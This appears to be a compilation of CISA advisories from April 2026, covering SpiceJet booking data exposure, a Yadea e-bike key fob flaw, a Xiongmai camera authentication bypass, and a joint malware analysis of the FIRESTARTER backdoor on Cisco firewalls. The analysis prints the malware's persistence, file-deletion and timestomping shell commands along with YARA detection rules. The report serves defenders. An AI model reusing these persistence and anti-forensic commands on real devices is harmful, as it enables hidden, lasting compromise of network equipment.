All material is UK Crown Copyright ©

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information. The following versions of SpiceJet Online Booking System are affected: Online Booking System vers:all/* (CVE-2026-6375, CVE-2026-6376) CVSS Vendor Equipment Vulnerabilities v3 7.5 SpiceJet SpiceJet Online Booking System Authorization Bypass Through User-Controlled Key, Missing Authentication for Critical Function Background Critical Infrastructure Sectors: Transportation Systems Countries/Areas Deployed: Worldwide Company Headquarters Location: India Vulnerabilities Expand All + CVE-2026-6375 A vulnerability in SpiceJet's booking API allows unauthenticated users to query passenger name records (PNRs) without any access controls. Because PNR identifiers follow a predictable pattern, an attacker could systematically enumerate valid records and obtain associated passenger names. This flaw stems from missing authorization checks on an endpoint intended for authenticated profile access. View CVE Details Affected Products SpiceJet Online Booking System Vendor: SpiceJet Product Version: SpiceJet Online Booking System: vers:all/* Product Status: known_affected Remediations Mitigation SpiceJet did not respond to CISA's requests to coordinate. Users are encouraged to reach out to SpiceJet for more information: https://corporate.spicejet.com/contactus.aspx https://corporate.spicejet.com/contactus.aspx Relevant CWE: CWE-639 Authorization Bypass Through User-Controlled Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-6376 A weakness in SpiceJet's public booking retrieval page permits full passenger booking details to be accessed using only a PNR and last name, with no authentication or verification mechanisms. This results in exposure of extensive personal, travel, and booking metadata to any unauthenticated user who can obtain or guess those basic inputs. The issue arises from improper access control on a sensitive data retrieval function. View CVE Details Affected Products SpiceJet Online Booking System Vendor: SpiceJet Product Version: SpiceJet Online Booking System: vers:all/* Product Status: known_affected Remediations Mitigation SpiceJet did not respond to CISA's requests to coordinate. Users are encouraged to reach out to SpiceJet for more information: https://corporate.spicejet.com/contactus.aspx https://corporate.spicejet.com/contactus.aspx Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments Owais Shaikh reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-23 Date Revision Summary 2026-04-23 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could result in an attacker being able to unlock and start the bicycle, leading to vehicle theft. The following versions of Yadea T5 Electric Bicycle are affected: T5 Electric Bicycle vers:all/* (CVE-2025-70994) CVSS Vendor Equipment Vulnerabilities v3 7.3 Yadea Yadea T5 Electric Bicycle Weak Authentication Background Critical Infrastructure Sectors: Transportation Systems Countries/Areas Deployed: Worldwide Company Headquarters Location: China Vulnerabilities Expand All + CVE-2025-70994 Yadea T5 Electric Bicycles have a weak authentication mechanism which is vulnerable to signal forgery after a local attacker intercepts any legitimate key fob transmissions. View CVE Details Affected Products Yadea T5 Electric Bicycle Vendor: Yadea Product Version: Yadea T5 Electric Bicycle: vers:all/* Product Status: known_affected Remediations Mitigation Yadea did not respond to CISA's attempts at coordination. Users of Yadea T5 Electric Bicycles are encouraged to keep their systems up to date and lock their property securely with external mechanisms. Users can contact Yadea at https://yadea.com/contact-us. https://yadea.com/contact-us Relevant CWE: CWE-1390 Weak Authentication Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H Acknowledgments Ashen Chathuranga reported this vulnerability to MITRE and CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. Revision History Initial Release Date: 2026-04-23 Date Revision Summary 2026-04-23 1 Initial Publication Legal Notice and Terms of Use

Malware Analysis Report at a Glance Malware Name FIRESTARTER Original Publication April 23, 2026 Executive Summary The Cybersecurity and Infrastructure Security Agency (CISA) analyzed a sample of FIRESTARTER malware obtained from a forensic investigation. CISA and the United Kingdom National Cyber Security Centre (NCSC) assess advanced persistent threat (APT) actors are using FIRESTARTER malware for persistence, specifically targeting publicly accessible Cisco Firepower and Secure Firewall devices running Adaptive Security Appliance (ASA) or Firepower Threat Defense (FTD) software. CISA and the NCSC are releasing this Malware Analysis Report to share analysis of one FIRESTARTER malware sample operating as a backdoor and urge organizations to take key response actions. Note: The release of this Malware Analysis Report aligns with CISA’s update to V1: Emergency Directive (ED) 25-03: Identify and Mitigate Potential Compromise of Cisco Devices and Supplemental Direction ED 25-03: Core Dump and Hunt Instructions. The malware outlined in this report is relevant for both Cisco Firepower and Secure Firewall devices; however, CISA has only observed a successful implant of the malware in the wild on a Cisco Firepower device running ASA software. Key Actions for U.S. FCEB Agencies Collect and submit core dumps to CISA’s Malware Next Generation platform. Immediately report the submission via CISA’s 24/7 Operations Center; CISA will reach out with next steps. Take no additional action until CISA provides further guidance. Key Actions for All Other Organizations Use the YARA rules to detect FIRESTARTER malware against either a disk image or core dump of a device. Report any findings to CISA or the NCSC. If compromise is confirmed, conduct incident response actions. Intended Audience Organizations: Government and critical infrastructure organizations (Note: While this publication supplements CISA ED 25-03, the guidance is applicable to all organizations, including U.K. organizations.) Sector: Government Services and Facilities Sector Roles: Digital forensics analysts, incident responders, vulnerability analysts, system administrators Introduction The Cybersecurity and Infrastructure Security Agency (CISA) analyzed a sample of FIRESTARTER malware obtained from a forensic investigation. CISA and the United Kingdom National Cyber Security Centre (NCSC) assess that FIRESTARTER—a backdoor that allows remote access and control—is part of a widespread campaign that afforded an advanced persistent threat (APT) actor initial access to Cisco Adaptive Security Appliance (ASA) firmware by exploiting CVE-2025-20333 [CWE-862: Missing Authorization] and/or CVE-2025-20362 [CWE-120: Classic Buffer Overflow]. For more information on this campaign, see CISA’s original version of Emergency Directive (ED) 25-03: Identify and Mitigate Potential Compromise of Cisco Devices (released Sept. 25, 2025). CISA and the NCSC assess that FIRESTARTER can persist as an active threat on Cisco devices running ASA or Firepower Threat Defense (FTD) software, maintaining post-patching persistence and enabling threat actors to re-access compromised devices without re-exploiting vulnerabilities. U.S. Federal Civilian Executive Branch (FCEB) agencies are required to implement the new required actions in CISA’s updated Emergency Directive (V1: ED 25-03). CISA and the NCSC urge other U.S. and U.K. organizations to use the YARA rules to detect FIRESTARTER malware against either a disk image or core dump of a device and report any findings to CISA or the NCSC. Organizations can also refer to Cisco’s Security Advisory and Talos Blog. Download the PDF version of this report: AR26-113A_MAR_FIRESTARTER_backdoor_ (PDF, 604.62 KB ) For a downloadable copy of the YARA rules associated with this malware, see: FIRESTARTER_STIX (JSON, 24.27 KB ) FIRESTARTER Collection CISA is authorized to monitor for, analyze, and notify U.S. FCEB agencies of anomalous or suspected malicious activity detected on federal networks. Through continuous monitoring, CISA identified suspicious connections on one U.S. FCEB agency’s Cisco Firepower device running ASA software. CISA notified and validated the true positive finding with agency personnel and initiated a forensic engagement. During the engagement, CISA discovered one malware sample—named FIRESTARTER—on the Firepower device. In this incident, APT actors initially deployed LINE VIPER as a post-exploitation implant and subsequently used FIRESTARTER as a persistence mechanism to maintain continued access to the compromised device. Although Cisco’s patches addressed CVE-2025-20333 and CVE-2025-20362, devices compromised prior to patching may remain vulnerable because FIRESTARTER is not removed by firmware updates. Threat Actor Activity  Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See Appendix A: MITRE ATT&CK Techniques for tables mapping the cyber actors’ activity to MITRE ATT&CK tactics and techniques. CISA’s analysis identified the following: Initial Access: CISA assesses, but has not confirmed, that APT actors obtained initial access by exploiting CVE-2025-20333 and/or CVE-2025-20362 [T1190]. CISA has not confirmed the exact date of initial exploitation but assesses the compromise occurred in early September 2025, and before the agency implemented patches in accordance with ED 25-03. Privilege Escalation and Defense Evasion: CISA identified that APT actors first deployed LINE VIPER to establish illegitimate virtual private network (VPN) sessions [T1133] that bypassed all VPN authentication policies. This activity was associated with user accounts that existed but were no longer active within the agency [T1078]. Although this behavior was observed in this incident, threat actors may use other (including fabricated) accounts. LINE VIPER enabled APT actors access to all configuration elements of the victim Firepower device, including administrative credentials, certificates, and private keys [T1082]. Persistence: APT actors deployed FIRESTARTER on the Firepower device before Sept. 25, 2025 (exact date is unknown). Because it was present before patching, FIRESTARTER persisted through remediation and established command and control (C2) channels on the victim Firepower device [T1219]. APT actors leveraged FIRESTARTER to regain access without re-exploiting the original vulnerabilities and deployed LINE VIPER in March 2026. Malware Summary FIRESTARTER is a Linux Executable and Linkable File (ELF) designed to execute on Cisco Firepower and Secure Firewall devices, serving as a C2 channel for remote access and control. The malware achieves persistence by detecting termination signals and relaunching itself, and it can survive firmware updates and device reboots unless a hard power cycle occurs. FIRESTARTER attempts to install a hook—a way to intercept and modify normal operations—within LINA, the device’s core engine for network processing and security functions. This hook enables the execution of arbitrary shell code provided by the APT actors, including the deployment of LINE VIPER. Note: The file CISA obtained for analysis was named lina_cs; filenames may vary, as threat actors can easily modify the name of the malicious file. Malware Functionality Initialization Upon execution, FIRESTARTER accesses its own binary located at /usr/bin/lina_cs on the device [T1036.005] and copies its contents into memory. It then registers a callback function that triggers when the program receives any of the following termination-related signals [T1546.004]: SIGTERM SIGINT SIGQUIT SIGABRT SIGHUP SIGTSTP After copying itself into heap, and updating the signal handlers, the shell executor initiates the following sequential commands: rm /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null cp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null chmod 755 /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null chown‑reference=/opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null touch‑r /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null rm /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null rm /usr/bin/lina_cs 2>/dev/null These commands delete the modified CSP_MOUNT_LIST file [T1070.004] restoring the original CSP_MOUNT_LIST. Execute permissions are granted to any user, the owner and timestamp are set to match the original [T1070.006], and the temporary file is then deleted. Finally, /usr/bin/lina_cs is deleted. Persistence and Shutdown Task When any of these signals are received or runlevel (6) is reached, the callback function is triggered and first checks whether the /opt/cisco/platform/logs/var/log/ directory exists. If absent, it creates the directory with full read/write/execute permissions [T1222]. The callback then opens /opt/cisco/platform/logs/var/log/svc_samcore.log and writes a copy of itself to this file, which is in a reboot-persistent directory. Next, the callback verifies whether /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST is present on the device. If the file is missing, FIRESTARTER creates it using a special function that can run shell commands [T1059]. After creating the file, the malware runs a series of callback commands (in sequential order) to establish persistence and manage its files: cp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST/opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null chown ‑reference=/opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null touch‑r /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null Append the contents below to /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST mv /opt/cisco/platform/logs/var/log/svc_samcore.log /usr/bin/lina_cs chmod 755 /usr/bin/lina_cs lina_cs & These commands first create a temporary copy of CSP_MOUNT_LIST with the same ownership information and timestamps. A script is appended to CSP_MOUNT_LIST. This script is the persistence mechanism, which moves FIRESTARTER from its staging location, svc_samcore.log, to /usr/bin/lina_cs. It then makes it executable and runs it in the background [T1547]. This sequence ensures persistent execution of the file, even when termination signals are received. All commands redirect any standard error (stderr) messages to /dev/null and hides them from the console [T1564]. Memory Scanning and Hook Installation The process enumerates LINA’s virtual memory map to locate the private read-write (rw-p) segment associated with lina [T1057], which represents the main process’s writable data region. Once identified, this memory segment is parsed using a custom algorithm to locate the XML Handler element table. The algorithm inspects each 0x260-byte region for element IDs. After identifying five element IDs in the correct offset sequence (each separated by 0x260 bytes), it calculates and stores the handler pointer address for the seventeenth element. Shellcode Injection FIRESTARTER scans LINA’s memory to locate the executable (r-xp) segment of libstdc++.so, which corresponds to the C++ standard library’s code section. The malware injects a block of shellcode 0x200 bytes before the end of the library’s text segment, installing the detour for the XML element handler [T1055]. The process then resumes its main loop and continues operating until it detects a reboot runlevel or the termination-related signals. Victim Identification and Stage Loading The FIRESTARTER malware closely mirrors the RayInitiator Cisco ASA bootkit stage 3 deploy path. The injected shellcode is triggered when LINA processes a WebVPN request containing the XML tag with the detoured handler. Within the <group-select> element, the malware searches for a hard-coded 8-byte ASCII string unique to the installation, verifying it against a predefined value embedded in the shellcode. Additionally, a victim-specific ID—another hard-coded 8-byte sequence—is compared against WebVPN request elements until a match is found. Upon successful verification of identification, the next stage of the malware is loaded by copying it into LINA’s memory and invoking mprotect to enable execution of the newly injected code [T1543]. Detection U.S. FCEB Agency Instructions The primary detection method for FIRESTARTER is memory analysis. In accordance with V1: ED 25-03, all U.S. FCEB agencies are required to collect device core dumps and submit them to CISA’s Malware Next Generation (MNG) platform (see Incident Response section), which analyzes core dumps for the presence and behavior of the lina_cs binary. U.S. FCEB agencies should not take further action without first consulting CISA. To preserve evidence, avoid any hard power cycles and other changes (e.g., reboots, patching, configuration changes) before collection and coordination, as these can affect volatile artifacts. Other U.S. and U.K. Recommendations CISA and the NCSC recommend using the following CISA-created YARA rules to detect FIRESTARTER when applied to a disk image or a core dump from a device: To obtain a disk image, open a Cisco Technical Assistance Center (TAC) case. For instructions on obtaining a core dump, see CISA’s Supplemental Direction for ED 25-03. Note: CISA recommends following this Supplemental Direction rather than other open source resources, as APT actors commonly employ anti-forensic techniques. YARA Rules See Table 1 for a list of FIRESTARTER YARA rules. Table 1. YARA Rules FIRESTARTER Rule 1 rule CISA_261290_01 : FIRESTARTER backdoor captures_system_state_data cleans_traces_of_infection fingerprints_host persists_after_system_reboot {  meta:       author = "CISA Code & Media Analysis"       incident = "261290"       date = "2026-4-3"       last_modified = "20260406_732"       actor = "n/a"       family = "n/a"       capabilities = "captures-system-state-data cleans-traces-of-infection fingerprints-host persists-after-system-reboot"       malware_type = "backdoor"       tool_type = "unknown"       description = "Detects CISCO Firepower FIRESTARTER injector samples"   strings:        $s1 = { 57 48 C1 EF 0C 48 C1 E7 0C BA 07 00 00 00 48 C7 C6 00 20 00 00 }        $s2 = { 2f 6f 70 74 2f 63 69 73 63 6f 2f 70 6c 61 74 66 6f 72 6d 2f 6c 6f 67 73 2f 76 61 72 2f 6c 6f 67 2f }        $s3 = { 2f 6f 70 74 2f 63 69 73 63 6f 2f 63 6f 6e 66 69 67 2f 70 6c 61 74 66 6f 72 6d 2f 72 6d 64 62 2f }        $s4 = { 2f 76 61 72 2f 72 75 6e 2f 72 75 6e 6c 65 76 65 6c}        $s5 = { 2f 70 72 6f 63 2f 25 73 2f 63 6f 6d 6d }        $s6 = { 2f 70 72 6f 63 2f 25 64 2f 6d 61 70 73 }        $s7 = { 2f 61 73 61 2f 62 69 6e 2f 6c 69 6e 61 }   condition:        5 of them } FIRESTARTER Rule 2 rule CISA_261290_02 : FIRESTARTER_shellcode backdoor captures_system_state_data cleans_traces_of_infection fingerprints_host persists_after_system_reboot {   meta:       author = "CISA Code & Media Analysis"       incident = "261290"       date = "2026-4-3"       last_modified = "20260406_732"       actor = "n/a"       family = "n/a"       capabilities = "captures-system-state-data cleans-traces-of-infection fingerprints-host persists-after-system-reboot"       malware_type = "backdoor"       tool_type = "unknownk"       description = "Detects CISCO Firepower FIRESTARTER_shellcode samples"    strings:        $1 = { 57 4C 8B 47 18 4D 85 C0 0F 84 C7 01 00 00 49 8B 38 48 85 FF }        $2 = { 48 83 C6 08 4C 39 C6 0F 87 7A 01 00 00 4C 8B 0E }        $3 = { 48 89 D7 4C 89 CE B9 D0 01 00 F3 A4 48 89 D7 57 48 C1 EF 0C 48 C1 E7 0C }        $4 = { 0F 05 58 5F FF E0 90 90 }    condition:        3 of them } Sigma Rules Given the nature of this malware, Sigma rules do not offer effective detection because it does not generate observable log events or behavioral anomalies in standard monitoring platforms. Incident Response U.S. FCEB Agencies CISA requires U.S. FCEB agencies to: Refer to the Supplemental Direction for ED 25-03 for guidance on running the “show checkheaps” and “show tech-support detail” commands. Ensure to save the full output off the device (preferably to an isolated system). Generate a core dump from the affected Cisco device(s) and submit it through CISA’s Malware Next Generation platform. Report the submission immediately via CISA’s 24/7 Operations Center (contact@cisa.dhs.gov, 1-844-Say-CISA [1-844-729-2472], or CISA’s Incident Reporting System). Identify the activity is related to FIRESTARTER. After incident intake, CISA will provide guidance on next steps. If compromise is confirmed, this may include instructions to physically unplug the device from power to remove FIRESTARTER’s persistence. Organizations should not unplug the device unless directed to do so by CISA. Other U.S. Organizations CISA recommends organizations take the following actions: Although applicable to U.S. FCEB agencies, refer to the Supplemental Direction for ED 25-03 for guidance on running the “show checkheaps” and “show tech-support detail” commands. Ensure to save the full output off the device (preferably to an isolated system). Generate a core dump from the affected Cisco device(s) and deploy the provided YARA rules. U.S. organizations can submit core dumps through CISA’s Malware Next Generation platform. If the core dump indicates the presence of FIRESTARTER malware, proceed with steps 3 and 4 below; additionally, activate internal incident response plans to assess potential lateral movement and impact: Unplug the device from all power sources—CISA assesses this is the only method to remove FIRESTARTER’s persistence from a device—then conduct the following steps: Locate the physical device. Unplug the physical device from its power source while the device is still powered on. Note: It is not sufficient to power the device off or reboot it. The device must be entirely removed from all power sources, including duplicate power sources created for redundancy. Leave the device fully disconnected from any power source for one minute. Reconnect the device to its power source and allow it to reboot. Promptly report any detection of FIRESTARTER malware to CISA. U.S. organizations can report to CISA’s 24/7 Operations Center (contact@cisa.dhs.gov, 1-844-Say-CISA [1-844-729-2472], or CISA’s Incident Reporting System). Requests for assistance can also be submitted to CISA via this reporting channel. U.K. Organizations The NCSC recommends U.K. organizations take the following actions: Refer to the Supplemental Direction for ED 25-03 for guidance on running the “show checkheaps” and “show tech-support detail” commands. Ensure to save the full output off the device (preferably to an isolated system). Generate a core dump from the affected Cisco device(s) and deploy the provided YARA rules. If FIRESTARTER is detected, report an incident to the NCSC via https://report.ncsc.gov.uk. After reporting an incident, the NCSC will provide guidance on next steps. If compromise is confirmed, this may include instructions to physically unplug the device from power to remove FIRESTARTER’s persistence. Organizations should not unplug the device unless directed to do so by the NCSC. Mitigations CISA and the NCSC recommend all organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals 2.0 (CPG 2.0) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections recommended for all organizations. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPG 2.0 webpage for more information on the CPGs, including additional recommended baseline protections. Maintain all systems and software with the latest security patches, prioritizing expedited remediation of vulnerabilities listed in CISA’s Known Exploited Vulnerabilities (KEV) Catalog [CPG 2.B]. At the time of ED 25-03’s release (Sept. 25, 2025), available patches did not specifically remediate FIRESTARTER; although patching mitigated initial access, it did not eliminate this persistence mechanism. For additional information on software updates that prevent FIRESTARTER’s persistence and for remediation guidance, refer to Cisco’s Security Advisory. Inventory all network edge devices [CPG 2.A], with a specific focus on Cisco devices. Monitor these devices for any suspicious network connections that correlate with the activity described in this report. Monitor and audit activity for all accounts with elevated privileges, including network administrators and service accounts, to detect unauthorized use or anomalous behavior. For example, track and review commands executed by these accounts, and promptly investigate any suspicious activity identified. Apply the principle of least privilege and restrict service accounts to needed permissions only [CPG 3.H]. Regularly rotate passwords for privileged accounts (such as network administrators) and service accounts. Routine password changes invalidate credentials that threat actors may have compromised, forcing them to reestablish access and increasing the likelihood of detection or disruption. While not specific to FIRESTARTER, modernize administrative access controls by implementing TACACS+ over TLS 1.3. This approach encrypts device administration Authentication, Authorization, and Accounting traffic, safeguards administrator and service account credentials, and reduces the risk of interception [CPG 3.K]. See Cisco’s blog, Modernizing TACACS+: Why Full-Session Encryption Matters More Than Ever. Disclaimer CISA and the NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, companies, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by CISA or the NCSC. Acknowledgements Cisco contributed to this Malware Analysis Report. Version History April 23, 2026: Initial version. Appendix A: MITRE ATT&CK Techniques See Table 2 through Table 7 all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 2. Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 The APT actors gained access to the victim’s Cisco Firepower device, likely by exploiting CVE-2025-20333 and/or CVE-2025-20362. Table 3. Execution Technique Title ID Use Command and Scripting Interpreter T1059 FIRESTARTER uses a special function to run shell commands that create /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST if it is missing. FIRESTARTER runs callback commands to manage its files. Table 4. Persistence Technique Title ID Use Create or Modify System Process T1543 FIRESTARTER invokes mprotect to enable execution of newly injected code. Event Triggered Execution: Unix Shell Configuration Modification T1546.004 FIRESTARTER registers a callback function that is automatically triggered when the program receives any of the following termination-related signals: SIGTERM, SIGINT, SIGQUIT, SIGABRT, SIGHUP, or SIGTSTP. Boot or Logon Autostart Execution T1547 Persistence is maintained by modifying a boot-time configuration/mount script so FIRESTARTER runs on startup. External Remote Services T1133 The APT actors used LINE VIPER to establish illegitimate VPN sessions. Valid Accounts T1078 The APT actors used valid user accounts for their illegitimate VPN sessions (the user accounts belonged to former employees). Table 5. Defense Evasion Technique Title ID Use File and Directory Permissions Modification T1222 FIRESTARTER creates the /opt/cisco/platform/logs/var/log/ directory with full read/write/execute permissions.  FIRESTARTER uses chown and chmod to modify file permissions. Hide Artifacts: Hidden Users T1564 FIRESTARTER redirects standard error (stderr) messages to /dev/null and hides them from the console. Indicator Removal on Host: File Deletion T1070.004 FIRESTARTER deletes the following files: CSP_MOUNT_LIST, CSP_MOUNT_LIST.tmp, and /usr/bin/lina_cs. Indicator Removal on Host: Timestomp T1070.006 FIRESTARTER uses touch -r to copy timestamps from original files to modified and temporary ones, explicitly to match the original. Masquerading: Match Legitimate Resource Name or Location T1036.005 FIRESTARTER accesses its own binary located at /usr/bin/lina_cs on the victim device. Process Injection T1055 FIRESTARTER injects shellcode into a library’s code section before the start of the text segment. Table 6. Discovery Technique Title ID Use Process Discovery T1057 FIRESTARTER enumerates LINA’s virtual memory map to locate the private read-write (rw-p) segment associated with lina. System Information Discovery T1082 The APT actors used LINE VIPER to access Cisco Firepower device configuration elements, including administrative credentials, certificates, and private keys. Table 7. Command and Control Technique Title ID Use Remote Access Tools T1219 FIRESTARTER is a Linux ELF designed to execute on Cisco Firepower and Secure Firewall devices, serving as a C2 channel for remote access and control.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-39987 Marimo Remote Code Execution Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to bypass authentication and have remote access to sensitive information on the device. The following versions of Hangzhou Xiongmai Technology Co., Ltd XM530 IP Camera are affected: IP Camera XM530V200_X6-WEQ_8M firmware V5.00.R02.000807D8.10010.346624.S.ONVIF_21.06 (CVE-2025-65856) CVSS Vendor Equipment Vulnerabilities v3 9.8 Hangzhou Xiongmai Technology Co., Ltd Hangzhou Xiongmai Technology Co., Ltd XM530 IP Camera Missing Authentication for Critical Function Background Critical Infrastructure Sectors: Commercial Facilities Countries/Areas Deployed: Worldwide Company Headquarters Location: China Vulnerabilities Expand All + CVE-2025-65856 Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access. View CVE Details Affected Products Hangzhou Xiongmai Technology Co., Ltd XM530 IP Camera Vendor: Hangzhou Xiongmai Technology Co., Ltd Product Version: Hangzhou Xiongmai Technology Co., Ltd IP Camera XM530V200_X6-WEQ_8M firmware: V5.00.R02.000807D8.10010.346624.S.ONVIF_21.06 Product Status: known_affected Remediations Mitigation Hangzhou Xiongmai Technology Co., Ltd has not responded to requests to work with CISA to mitigate this vulnerability. Users of affected versions of XM530 IP cameras are invited to contact Xiongmai Technology customer support for additional information (https://www.xiongmaitech.com/en/index.php/about/contact/42). https://www.xiongmaitech.com/en/index.php/about/contact/42 Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Acknowledgments CISA discovered a public Proof of Concept (PoC) as authored by Luis Miranda Acebedo and reported it to MITRE Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-23 Date Revision Summary 2026-04-23 1 Initial Publication Legal Notice and Terms of Use

